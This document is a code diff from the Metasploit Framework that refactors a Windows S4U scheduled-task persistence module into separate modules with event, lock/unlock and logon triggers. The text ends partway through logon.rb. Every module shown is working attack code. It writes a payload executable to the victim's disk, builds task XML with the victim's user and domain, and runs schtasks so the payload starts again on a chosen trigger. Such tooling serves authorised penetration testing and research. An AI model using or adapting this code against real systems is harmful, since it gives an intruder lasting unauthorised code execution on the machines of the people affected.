+++ b/modules/exploits/windows/persistence/service_for_user/event.rb
@@ -9,126 +9,102 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Post::Windows::Priv
   include Exploit::EXE
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+  # include Msf::Post::Windows::TaskScheduler # task scheduler doesn't have an XML create method
+  include Msf::Exploit::Deprecated
+  moved_from 'exploits/windows/local/s4u_persistence'
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Windows Manage User Level Persistent Payload Installer',
+        'Name' => 'Windows Service for User (S4U) Scheduled Task Persistence - Event Trigger',
         'Description' => %q{
           Creates a scheduled task that will run using service-for-user (S4U).
           This allows the scheduled task to run even as an unprivileged user
           that is not logged into the device. This will result in lower security
           context, allowing access to local resources only. The module
           requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+
+          This variant uses an event trigger to launch the payload when a
+          specified event is logged to the Windows Event Log.
+
+          See documentation for more interesting event trigger ideas.
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
-          'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
+          'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>', # original module
+          'Brandon McCann "zeknox" <bmccann[at]accuvant.com>', # original module
+          'h00die' # persistence updates
         ],
         'Platform' => 'win',
         'SessionTypes' => [ 'meterpreter' ],
+        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
         'Targets' => [ [ 'Windows', {} ] ],
         'DisclosureDate' => '2013-01-02', # Date of scriptjunkie's blog post
         'DefaultTarget' => 0,
         'References' => [
-          [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/' ],
-          [ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/' ]
+          [ 'URL', 'https://web.archive.org/web/20131103174249/https://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/' ],
+          [ 'URL', 'https://web.archive.org/web/20250625082052/http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/' ],
+          [ 'URL', 'https://web.archive.org/web/20131123075026/http://msdn.microsoft.com/en-us/magazine/cc188757.aspx' ],
+          [ 'URL', 'https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx' ],
+          ['ATT&CK', Mitre::Attack::Technique::T1053_005_SCHEDULED_TASK]
         ],
-        'Compat' => {
-          'Meterpreter' => {
-            'Commands' => %w[
-              stdapi_railgun_api
-              stdapi_sys_config_getenv
-              stdapi_sys_config_getuid
-            ]
-          }
-        },
         'Notes' => {
-          'Reliability' => UNKNOWN_RELIABILITY,
-          'Stability' => UNKNOWN_STABILITY,
-          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]
         }
       )
     )
 
     register_options(
       [
-        OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']),
         OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', 0]),
-        OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule', ['event', 'lock', 'logon', 'schedule', 'unlock']]),
-        OptString.new('REXENAME', [false, 'Name of exe on remote system']),
-        OptString.new('RTASKNAME', [false, 'Name of task on remote system']),
-        OptString.new('PATH', [false, 'PATH to write payload', '%TEMP%'])
-      ]
-    )
-
-    register_advanced_options(
-      [
-        OptString.new('EVENT_LOG', [false, 'Event trigger: The event log to check for event']),
-        OptInt.new('EVENT_ID', [false, 'Event trigger: Event ID to trigger on.']),
+        OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
+        OptString.new('TASK_NAME', [false, 'The name of task. Random string as default.' ]),
+        OptString.new('EVENT_LOG', [
+          true, 'The event log to check for event', 'System',
+          %w[Application System Security Setup ForwardedEvents]
+        ]),
+        OptInt.new('EVENT_ID', [true, 'Event ID to trigger on.']),
         OptString.new('XPATH', [false, 'XPath query'])
       ]
     )
   end
 
-  def exploit
+  def writable_dir
+    d = super
+    return session.sys.config.getenv(d) if d.start_with?('%')
+
+    d
+  end
+
+  def check
     version = get_version_info
-    unless version.build_number >= Msf::WindowsVersion::Vista_SP0
-      fail_with(Failure::NoTarget, 'This module only works on Vista/2008 and above')
-    end
+    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
+    return CheckCode::Safe("#{writable_dir} doesn't exist") unless exists?(writable_dir)
+    return CheckCode::Safe('This module only works on Vista/2008 and above') unless version.build_number >= Msf::WindowsVersion::Vista_SP0
 
-    if datastore['TRIGGER'] == 'event' && (datastore['EVENT_LOG'].nil? || datastore['EVENT_ID'].nil?)
-      print_status('The properties of any event in the event viewer will contain this information')
-      fail_with(Failure::BadConfig, 'Advanced options EVENT_LOG and EVENT_ID required for event')
-    end
-
-    # Generate payload
-    payload = generate_payload_exe
-
-    # Generate remote executable name
-    rexename = generate_rexename
-
-    # Generate path names
-    xml_path, rexe_path = generate_path(rexename)
-
-    # Upload REXE to victim fs
-    upload_rexe(rexe_path, payload)
-
-    # Create basic XML outline
-    xml = create_xml(rexe_path)
-
-    # Fix XML based on trigger
-    xml = add_xml_triggers(xml)
-
-    # Write XML to victim fs, if fail clean up
-    write_xml(xml, xml_path, rexe_path)
-
-    # Name task with Opt or give random name
-    schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha(rand(6..13))
-
-    # Create task with modified XML
-    create_task(xml_path, schname, rexe_path)
+    return CheckCode::Appears('Target is likely exploitable')
   end
 
   ##############################################################
   # Generate name for payload
   # Returns name
   def generate_rexename
-    rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha(rand(6..13)) + '.exe'
-    if rexename !~ /\.exe$/
-      print_warning("#{datastore['REXENAME']} isn't an exe")
-    end
-    return rexename
+    rexename = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(rand(6..13)) + '.exe'
+    rexename += '.exe' unless rexename.downcase.end_with?('.exe')
+    rexename
   end
 
   ##############################################################
   # Generate Path for payload upload
   # Returns path for XML and payload
-  def generate_path(rexename)
+  def generate_paths(rexename)
     # Generate a path to write payload and XML
-    path = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    path = writable_dir
     xml_path = "#{path}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.xml"
     rexe_path = "#{path}\\#{rexename}"
     return xml_path, rexe_path
@@ -192,51 +168,16 @@ class MetasploitModule < Msf::Exploit::Local
   # add in expiration tag if used.
   # Returns the modified XML
   def add_xml_triggers(xml)
-    # Insert trigger
-    case datastore['TRIGGER']
-    when 'logon'
-      # Trigger based on winlogon event, checks windows license key after logon
-      print_status('This trigger triggers on event 4101 which validates the Windows license')
-      line = "*[System[EventID='4101']] and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]"
-      xml = create_trigger_event_tags('Application', line, xml)
-
-    when 'lock'
-      xml = create_trigger_tags('SessionLock', xml)
-
-    when 'unlock'
-      xml = create_trigger_tags('SessionUnlock', xml)
-
-    when 'event'
-      line = "*[System[(EventID=#{datastore['EVENT_ID']})]]"
-      if !datastore['XPATH'].nil? && !datastore['XPATH'].empty?
-        # Append xpath queries
-        line << " and #{datastore['XPATH']}"
-        # Print XPath query, useful to user to spot issues with uncommented single quotes
-        print_status("XPath query: #{line}")
-      end
-
-      xml = create_trigger_event_tags(datastore['EVENT_LOG'], line, xml)
-
-    when 'schedule'
-      # Change interval tag, insert into XML
-      unless datastore['FREQUENCY'].nil? || datastore['FREQUENCY'] == 0
-        minutes = datastore['FREQUENCY']
-      else
-        print_status('Defaulting frequency to every hour')
-        minutes = 60
-      end
-      xml = xml.sub(/<Interval>.*?</, "<Interval>PT#{minutes}M<")
-
-      # Insert expire tag if not 0
-      unless datastore['EXPIRE_TIME'] == 0
-        # Generate expire tag
-        end_boundary = create_expire_tag
-        # Inject expire tag
-        insert = xml.index('</StartBoundary>')
-        xml.insert(insert + 16, "\n      #{end_boundary}")
-      end
+    line = "*[System[(EventID=#{datastore['EVENT_ID']})]]"
+    if !datastore['XPATH'].nil? && !datastore['XPATH'].empty?
+      # Append xpath queries
+      line << " and #{datastore['XPATH']}"
+      # Print XPath query, useful to user to spot issues with uncommented single quotes
+      print_status("XPath query: #{line}")
     end
-    return xml
+
+    xml = create_trigger_event_tags(datastore['EVENT_LOG'], line, xml)
+    xml
   end
 
   ##############################################################
@@ -259,27 +200,6 @@ class MetasploitModule < Msf::Exploit::Local
     time = t.strftime('%H:%M:%S')
     end_boundary = "<EndBoundary>#{date}T#{time}</EndBoundary>"
     return end_boundary
-  end
-
-  ##############################################################
-  # Creates trigger XML for session state triggers and replaces
-  # the time trigger.
-  # Returns altered XML
-  def create_trigger_tags(trig, xml)
-    domain, user = client.sys.config.getuid.split('\\')
-
-    # Create session state trigger, weird spacing used to maintain
-    # natural Winadows spacing for XML export
-    temp_xml = "<SessionStateChangeTrigger>\n"
-    temp_xml << "      #{create_expire_tag}" unless datastore['EXPIRE_TIME'] == 0
-    temp_xml << "      <Enabled>true</Enabled>\n"
-    temp_xml << "      <StateChange>#{trig}</StateChange>\n"
-    temp_xml << "      <UserId>#{domain}\\#{user}</UserId>\n"
-    temp_xml << '    </SessionStateChangeTrigger>'
-
-    xml = xml.gsub(%r{<TimeTrigger>.*</TimeTrigger>}m, temp_xml)
-
-    return xml
   end
 
   ##############################################################
@@ -324,7 +244,7 @@ class MetasploitModule < Msf::Exploit::Local
   # Takes path and delete file
   # Returns boolean for success
   def delete_file(path)
-    file_rm(path)
+    rm_f(path)
   rescue StandardError
     print_warning("Could not delete file #{path}, delete manually")
   end
@@ -334,32 +254,17 @@ class MetasploitModule < Msf::Exploit::Local
   # Returns boolean for success
   def create_task(path, schname, rexe_path)
     # create task using XML file on victim fs
-    create_task_response = cmd_exec('cmd.exe', "/c schtasks /create /xml #{path} /tn \"#{schname}\"")
+    create_task_response = cmd_exec("cmd /c \"schtasks /create /xml \"#{path}\" /tn \"#{schname}\"\"")
     if create_task_response =~ /has successfully been created/
       print_good("Persistence task #{schname} created successfully")
 
       # Create to delete commands for exe and task
-      del_task = "schtasks /delete /tn \"#{schname}\" /f"
-      print_status("#{'To delete task:'.ljust(20)} #{del_task}")
-      print_status("#{'To delete payload:'.ljust(20)} del #{rexe_path}")
-      del_task << "\ndel #{rexe_path}"
+      @clean_up_rc << "execute -f cmd.exe -a \"/c schtasks /delete /tn #{schname} /f\"\n"
+      @clean_up_rc << "rm \"#{rexe_path}\"\n"
 
       # Delete XML from victim
       delete_file(path)
 
-      # Save info to notes DB
-      report_note(host: session.session_host,
-                  type: 'host.s4u_persistance.cleanup',
-                  data: {
-                    session_num: session.sid,
-                    stype: session.type,
-                    desc: session.info,
-                    platform: session.platform,
-                    via_payload: session.via_payload,
-                    via_exploit: session.via_exploit,
-                    created_at: Time.now.utc,
-                    delete_commands: del_task
-                  })
     elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/
       # Clean up
       delete_file(rexe_path)
@@ -378,4 +283,38 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::Unknown, error)
     end
   end
+
+  def install_persistence
+    if datastore['EVENT_LOG'] == 'Security' && !is_admin?
+      fail_with(Failure::BadConfig, 'Event log "Security" requires admin privileges')
+    end
+
+    # Generate payload
+    payload = generate_payload_exe
+
+    # Generate remote executable name
+    rexename = generate_rexename
+
+    # Generate path names
+    xml_path, rexe_path = generate_paths(rexename)
+
+    # Upload REXE to victim fs
+    upload_rexe(rexe_path, payload)
+
+    # Create basic XML outline
+    xml = create_xml(rexe_path)
+
+    # Fix XML based on trigger
+    xml = add_xml_triggers(xml)
+
+    # Write XML to victim fs, if fail clean up
+    write_xml(xml, xml_path, rexe_path)
+
+    # Name task with Opt or give random name
+    schname = datastore['TASK_NAME'] || Rex::Text.rand_text_alpha(rand(6..13))
+
+    # Create task with modified XML
+    create_task(xml_path, schname, rexe_path)
+  end
+
 end

--- a/modules/exploits/windows/persistence/service_for_user/event.rb
+++ b/modules/exploits/windows/persistence/service_for_user/event.rb
@@ -49,6 +49,7 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'URL', 'https://web.archive.org/web/20250625082052/http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/' ],
           [ 'URL', 'https://web.archive.org/web/20131123075026/http://msdn.microsoft.com/en-us/magazine/cc188757.aspx' ],
           [ 'URL', 'https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx' ],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
           ['ATT&CK', Mitre::Attack::Technique::T1053_005_SCHEDULED_TASK]
         ],
         'Notes' => {

--- a/modules/exploits/windows/persistence/service_for_user/lock_unlock.rb
+++ b/modules/exploits/windows/persistence/service_for_user/lock_unlock.rb
@@ -1,0 +1,306 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Exploit::EXE
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+  # include Msf::Post::Windows::TaskScheduler # task scheduler doesn't have an XML create method
+  include Msf::Exploit::Deprecated
+  moved_from 'exploits/windows/local/s4u_persistence'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Service for User (S4U) Scheduled Task Persistence - Logon Trigger',
+        'Description' => %q{
+          Creates a scheduled task that will run using service-for-user (S4U).
+          This allows the scheduled task to run even as an unprivileged user
+          that is not logged into the device. This will result in lower security
+          context, allowing access to local resources only. The module
+          requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+
+          This triggers on either a lock or unlock of the workstation.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>', # original module
+          'Brandon McCann "zeknox" <bmccann[at]accuvant.com>', # original module
+          'h00die' # persistence updates
+        ],
+        'Platform' => 'win',
+        'SessionTypes' => [ 'meterpreter' ],
+        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Targets' => [ [ 'Windows', {} ] ],
+        'DisclosureDate' => '2013-01-02', # Date of scriptjunkie's blog post
+        'DefaultTarget' => 0,
+        'References' => [
+          [ 'URL', 'https://web.archive.org/web/20131103174249/https://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/' ],
+          [ 'URL', 'https://web.archive.org/web/20250625082052/http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/' ],
+          [ 'URL', 'https://web.archive.org/web/20131123075026/http://msdn.microsoft.com/en-us/magazine/cc188757.aspx' ],
+          ['ATT&CK', Mitre::Attack::Technique::T1053_005_SCHEDULED_TASK]
+        ],
+        'Notes' => {
+          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'unlock', ['lock', 'unlock']]),
+        OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', 0]),
+        OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
+        OptString.new('TASK_NAME', [false, 'The name of task. Random string as default.' ]),
+      ]
+    )
+  end
+
+  def writable_dir
+    d = super
+    return session.sys.config.getenv(d) if d.start_with?('%')
+
+    d
+  end
+
+  def check
+    version = get_version_info
+    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
+    return CheckCode::Safe("#{writable_dir} doesn't exist") unless exists?(writable_dir)
+    return CheckCode::Safe('This module only works on Vista/2008 and above') unless version.build_number >= Msf::WindowsVersion::Vista_SP0
+
+    return CheckCode::Appears('Target is likely exploitable')
+  end
+
+  ##############################################################
+  # Generate name for payload
+  # Returns name
+  def generate_rexename
+    rexename = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(rand(6..13)) + '.exe'
+    rexename += '.exe' unless rexename.downcase.end_with?('.exe')
+    rexename
+  end
+
+  ##############################################################
+  # Generate Path for payload upload
+  # Returns path for XML and payload
+  def generate_paths(rexename)
+    # Generate a path to write payload and XML
+    path = writable_dir
+    xml_path = "#{path}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.xml"
+    rexe_path = "#{path}\\#{rexename}"
+    return xml_path, rexe_path
+  end
+
+  ##############################################################
+  # Upload the executable payload
+  # Returns boolean for success
+  def upload_rexe(path, payload)
+    vprint_status("Uploading #{path}")
+
+    if file? path
+      fail_with(Failure::Unknown, "File #{path} already exists... Exiting")
+    end
+
+    begin
+      write_file(path, payload)
+    rescue StandardError
+      fail_with(Failure::Unknown, "Could not upload to #{path}")
+    end
+
+    print_good("Successfully Uploaded remote executable to #{path}")
+  end
+
+  ##############################################################
+  # Creates a scheduled task, exports as XML, deletes task
+  # Returns normal XML for generic task
+  def create_xml(rexe_path)
+    xml_path = File.join(Msf::Config.data_directory, 'exploits', 's4u_persistence.xml')
+    xml_file = File.new(xml_path, 'r')
+    xml = xml_file.read
+    xml_file.close
+
+    # Get local time, not system time from victim machine
+    begin
+      vt = client.railgun.kernel32.GetLocalTime(32)
+      ut = vt['lpSystemTime'].unpack('v*')
+      t = ::Time.utc(ut[0], ut[1], ut[3], ut[4], ut[5])
+    rescue StandardError
+      print_warning('Could not read system time from victim... Using your local time to determine creation date')
+      t = ::Time.now
+    end
+    date = t.strftime('%Y-%m-%d')
+    time = t.strftime('%H:%M:%S')
+
+    # Put in correct times
+    xml = xml.gsub(/DATEHERE/, "#{date}T#{time}")
+
+    domain, user = client.sys.config.getuid.split('\\')
+
+    # Put in user information
+    xml = xml.sub(/DOMAINHERE/, user)
+    xml = xml.sub(/USERHERE/, "#{domain}\\#{user}")
+
+    xml = xml.sub(/COMMANDHERE/, rexe_path)
+    return xml
+  end
+
+  ##############################################################
+  # Takes the XML, alters it based on trigger specified. Will also
+  # add in expiration tag if used.
+  # Returns the modified XML
+  def add_xml_triggers(xml)
+    # Insert trigger
+    case datastore['TRIGGER']
+    when 'lock'
+      xml = create_trigger_tags('SessionLock', xml)
+
+    when 'unlock'
+      xml = create_trigger_tags('SessionUnlock', xml)
+    end
+    return xml
+  end
+
+  ##############################################################
+  # Creates end boundary tag which expires the trigger
+  # Returns XML for expire
+  def create_expire_tag
+    # Get local time, not system time from victim machine
+    begin
+      vt = client.railgun.kernel32.GetLocalTime(32)
+      ut = vt['lpSystemTime'].unpack('v*')
+      t = ::Time.utc(ut[0], ut[1], ut[3], ut[4], ut[5])
+    rescue StandardError
+      print_error('Could not read system time from victim... Using your local time to determine expire date')
+      t = ::Time.now
+    end
+
+    # Create time object to add expire time to and create tag
+    t += (datastore['EXPIRE_TIME'] * 60)
+    date = t.strftime('%Y-%m-%d')
+    time = t.strftime('%H:%M:%S')
+    end_boundary = "<EndBoundary>#{date}T#{time}</EndBoundary>"
+    return end_boundary
+  end
+
+  ##############################################################
+  # Creates trigger XML for session state triggers and replaces
+  # the time trigger.
+  # Returns altered XML
+  def create_trigger_tags(trig, xml)
+    domain, user = client.sys.config.getuid.split('\\')
+
+    # Create session state trigger, weird spacing used to maintain
+    # natural Winadows spacing for XML export
+    temp_xml = "<SessionStateChangeTrigger>\n"
+    temp_xml << "      #{create_expire_tag}" unless datastore['EXPIRE_TIME'] == 0
+    temp_xml << "      <Enabled>true</Enabled>\n"
+    temp_xml << "      <StateChange>#{trig}</StateChange>\n"
+    temp_xml << "      <UserId>#{domain}\\#{user}</UserId>\n"
+    temp_xml << '    </SessionStateChangeTrigger>'
+
+    xml = xml.gsub(%r{<TimeTrigger>.*</TimeTrigger>}m, temp_xml)
+
+    return xml
+  end
+
+  ##############################################################
+  # Takes the XML and a path and writes file to filesystem
+  # Returns boolean for success
+  def write_xml(xml, path, rexe_path)
+    if file? path
+      delete_file(rexe_path)
+      fail_with(Failure::Unknown, "File #{path} already exists... Exiting")
+    end
+    begin
+      write_file(path, xml)
+    rescue StandardError
+      delete_file(rexe_path)
+      fail_with(Failure::Unknown, "Issues writing XML to #{path}")
+    end
+    print_good("Successfully wrote XML file to #{path}")
+  end
+
+  ##############################################################
+  # Takes path and delete file
+  # Returns boolean for success
+  def delete_file(path)
+    rm_f(path)
+  rescue StandardError
+    print_warning("Could not delete file #{path}, delete manually")
+  end
+
+  ##############################################################
+  # Takes path and name for task and creates final task
+  # Returns boolean for success
+  def create_task(path, schname, rexe_path)
+    # create task using XML file on victim fs
+    create_task_response = cmd_exec("cmd /c \"schtasks /create /xml \"#{path}\" /tn \"#{schname}\"\"")
+    if create_task_response =~ /has successfully been created/
+      print_good("Persistence task #{schname} created successfully")
+
+      # Create to delete commands for exe and task
+      @clean_up_rc << "execute -f cmd.exe -a \"/c schtasks /delete /tn #{schname} /f\"\n"
+      @clean_up_rc << "rm \"#{rexe_path}\"\n"
+
+      # Delete XML from victim
+      delete_file(path)
+
+    elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/
+      # Clean up
+      delete_file(rexe_path)
+      delete_file(path)
+      error = 'The scheduled task name is already in use'
+      fail_with(Failure::Unknown, error)
+    else
+      error = 'Issues creating task using XML file schtasks'
+      vprint_error("Error: #{create_task_response}")
+      if (datastore['EVENT_LOG'] == 'Security') && (datastore['TRIGGER'] == 'Event')
+        print_warning('Security log can restricted by UAC, try a different trigger')
+      end
+      # Clean up
+      delete_file(rexe_path)
+      delete_file(path)
+      fail_with(Failure::Unknown, error)
+    end
+  end
+
+  def install_persistence
+    # Generate payload
+    payload = generate_payload_exe
+
+    # Generate remote executable name
+    rexename = generate_rexename
+
+    # Generate path names
+    xml_path, rexe_path = generate_paths(rexename)
+
+    # Upload REXE to victim fs
+    upload_rexe(rexe_path, payload)
+
+    # Create basic XML outline
+    xml = create_xml(rexe_path)
+
+    # Fix XML based on trigger
+    xml = add_xml_triggers(xml)
+
+    # Write XML to victim fs, if fail clean up
+    write_xml(xml, xml_path, rexe_path)
+
+    # Name task with Opt or give random name
+    schname = datastore['TASK_NAME'] || Rex::Text.rand_text_alpha(rand(6..13))
+
+    # Create task with modified XML
+    create_task(xml_path, schname, rexe_path)
+  end
+
+end

--- a/modules/exploits/windows/persistence/service_for_user/lock_unlock.rb
+++ b/modules/exploits/windows/persistence/service_for_user/lock_unlock.rb
@@ -45,6 +45,7 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'URL', 'https://web.archive.org/web/20131103174249/https://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/' ],
           [ 'URL', 'https://web.archive.org/web/20250625082052/http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/' ],
           [ 'URL', 'https://web.archive.org/web/20131123075026/http://msdn.microsoft.com/en-us/magazine/cc188757.aspx' ],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
           ['ATT&CK', Mitre::Attack::Technique::T1053_005_SCHEDULED_TASK]
         ],
         'Notes' => {

--- a/modules/exploits/windows/persistence/service_for_user/logon.rb
+++ b/modules/exploits/windows/persistence/service_for_user/logon.rb
@@ -1,0 +1,302 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Exploit::EXE
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+  # include Msf::Post::Windows::TaskScheduler # task scheduler doesn't have an XML create method
+  include Msf::Exploit::Deprecated
+  moved_from 'exploits/windows/local/s4u_persistence'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Service for User (S4U) Scheduled Task Persistence - Logon Trigger',
+        'Description' => %q{
+          Creates a scheduled task that will run using service-for-user (S4U).
+          This allows the scheduled task to run even as an unprivileged user
+          that is not logged into the device. This will result in lower security
+          context, allowing access to local resources only. The module
+          requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+
+          This triggers on event 4101 which validates the Windows license after logon.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>', # original module
+          'Brandon McCann "zeknox" <bmccann[at]accuvant.com>', # original module
+          'h00die' # persistence updates
+        ],
+        'Platform' => 'win',
+        'SessionTypes' => [ 'meterpreter' ],
+        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Targets' => [ [ 'Windows', {} ] ],
+        'DisclosureDate' => '2013-01-02', # Date of scriptjunkie's blog post
+        'DefaultTarget' => 0,
+        'References' => [
+          [ 'URL', 'https://web.archive.org/web/20131103174249/https://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/' ],
+          [ 'URL', 'https://web.archive.org/web/20250625082052/http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/' ],
+          [ 'URL', 'https://web.archive.org/web/20131123075026/http://msdn.microsoft.com/en-us/magazine/cc188757.aspx' ],
+          ['ATT&CK', Mitre::Attack::Technique::T1053_005_SCHEDULED_TASK]
+        ],
+        'Notes' => {
+          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', 0]),
+        OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
+        OptString.new('TASK_NAME', [false, 'The name of task. Random string as default.' ]),
+      ]
+    )
+  end
+
+  def writable_dir
+    d = super
+    return session.sys.config.getenv(d) if d.start_with?('%')
+
+    d
+  end
+
+  def check
+    version = get_version_info
+    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
+    return CheckCode::Safe("#{writable_dir} doesn't exist") unless exists?(writable_dir)
+    return CheckCode::Safe('This module only works on Vista/2008 and above') unless version.build_number >= Msf::WindowsVersion::Vista_SP0
+
+    return CheckCode::Appears('Target is likely exploitable')
+  end
+
+  ##############################################################
+  # Generate name for payload
+  # Returns name
+  def generate_rexename
+    rexename = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(rand(6..13)) + '.exe'
+    rexename += '.exe' unless rexename.downcase.end_with?('.exe')
+    rexename
+  end
+
+  ##############################################################
+  # Generate Path for payload upload
+  # Returns path for XML and payload
+  def generate_paths(rexename)
+    # Generate a path to write payload and XML
+    path = writable_dir
+    xml_path = "#{path}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.xml"
+    rexe_path = "#{path}\\#{rexename}"
+    return xml_path, rexe_path
+  end
+
+  ##############################################################
+  # Upload the executable payload
+  # Returns boolean for success
+  def upload_rexe(path, payload)
+    vprint_status("Uploading #{path}")
+
+    if file? path
+      fail_with(Failure::Unknown, "File #{path} already exists... Exiting")
+    end
+
+    begin
+      write_file(path, payload)
+    rescue StandardError
+      fail_with(Failure::Unknown, "Could not upload to #{path}")
+    end
+
+    print_good("Successfully Uploaded remote executable to #{path}")
+  end
+
+  ##############################################################
+  # Creates a scheduled task, exports as XML, deletes task
+  # Returns normal XML for generic task
+  def create_xml(rexe_path)
+    xml_path = File.join(Msf::Config.data_directory, 'exploits', 's4u_persistence.xml')
+    xml_file = File.new(xml_path, 'r')
+    xml = xml_file.read
+    xml_file.close
+
+    # Get local time, not system time from victim machine
+    begin
+      vt = client.railgun.kernel32.GetLocalTime(32)
+      ut = vt['lpSystemTime'].unpack('v*')
+      t = ::Time.utc(ut[0], ut[1], ut[3], ut[4], ut[5])
+    rescue StandardError
+      print_warning('Could not read system time from victim... Using your local time to determine creation date')
+      t = ::Time.now
+    end
+    date = t.strftime('%Y-%m-%d')
+    time = t.strftime('%H:%M:%S')
+
+    # Put in correct times
+    xml = xml.gsub(/DATEHERE/, "#{date}T#{time}")
+
+    domain, user = client.sys.config.getuid.split('\\')
+
+    # Put in user information
+    xml = xml.sub(/DOMAINHERE/, user)
+    xml = xml.sub(/USERHERE/, "#{domain}\\#{user}")
+
+    xml = xml.sub(/COMMANDHERE/, rexe_path)
+    return xml
+  end
+
+  ##############################################################
+  # Takes the XML, alters it based on trigger specified. Will also
+  # add in expiration tag if used.
+  # Returns the modified XML
+  def add_xml_triggers(xml)
+    # Trigger based on winlogon event, checks windows license key after logon
+    print_status('This triggers on event 4101 which validates the Windows license after logon')
+    line = "*[System[EventID='4101']] and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]"
+    xml = create_trigger_event_tags('Application', line, xml)
+
+    xml
+  end
+
+  ##############################################################
+  # Creates end boundary tag which expires the trigger
+  # Returns XML for expire
+  def create_expire_tag
+    # Get local time, not system time from victim machine
+    begin
+      vt = client.railgun.kernel32.GetLocalTime(32)
